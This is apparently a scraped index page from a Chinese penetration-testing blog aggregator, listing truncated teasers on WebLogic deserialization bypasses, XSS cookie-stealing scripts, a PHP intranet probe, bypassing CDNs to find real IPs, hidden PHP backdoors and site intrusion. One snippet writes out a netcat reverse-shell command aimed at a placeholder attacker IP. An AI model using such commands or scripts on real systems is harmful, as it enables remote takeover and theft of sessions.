利用点是weblogic的xmldecoder反序列化漏洞,只是构造巧妙的利用链对Oracle官方历年来对这个漏洞点的补丁绕过
颓废's Blog
颓废's Blog
moonsec_com
INURLB,一款高级黑客搜索引擎工具
INURLB是一款基于PHP的黑客高级搜索引擎,其支持24个搜索引擎,拥有6个深度web或者特殊选项。这些对于渗透测试 的信息收集和漏洞评估,有着十分重要的意义。
moonsec_com
xss一些小脚本
xxx.1 xss 配合php获取cookie和session的脚本 <script>document.write('&...
moonsec_com
一款开源指纹识别工具。
一款开源指纹识别工具。 https://github.com/Ms0x0/Dayu
moonsec_com
Seay批量域名解析IP
Seay批量域名解析IP 渗透 大型网站必备。 Seay批量域名解析IP.rar
moonsec_com
php内网探测脚本&简单代理访问
<?php $url = isset($_REQUEST)?$_REQUEST:null; $ip = isset($_REQUEST)?$_REQUEST:null; if($url != n...
moonsec_com
phpcms v9如何设置后台某IP段可以登陆?
用phpcms v9做开发的时候,有时候不想让别人在某IP登陆,可以再代码里面修改一下设置只有某IP段下才可以登陆,怎么办呢?这样做很安全的,直接上代码吧,你找到models/ad...
moonsec_com
如何绕cdn找真实IP(暗月原创)
如何绕cdn找真实IP 暗月 原创) 如题 经常有学员 或者群里的朋友问 暗月 。
moonsec_com
linux下反弹Shell的五种方法
1. nc <attacker_ip> <port> -e /bin/bash 2. mknod backpipe p;...
moonsec_com
REMOTE_ADDR注射的可行性
?>http://gaojohn.blogchina.com/1257809.html
![记一次发现利用preg_replace隐藏后门和后续探究 [转]](http://cn-sec.com/wp-content/themes/begin-lts-1/img/random/8.jpg)
moonsec_com
记一次发现利用preg_replace隐藏后门和后续探究 [转]
php后门有很多,包子也见多了和玩多了,但是在一次帮助朋友检查服务器的时候,竟然发现这样的恶意代码。 事情是这样的,朋友的网站的利用各种查找后门的工具都没有发现php木马。老是找不到,小...
moonsec_com
黑客是怎样入侵你的网站的
感谢ppsbb 投递 这个问题很难回答,简单的来说,入侵一个网站可以有很多种方法。本文的目的是展示黑客们常用的扫描和入侵网站的技术。 假设你的站点是:hack-test.com
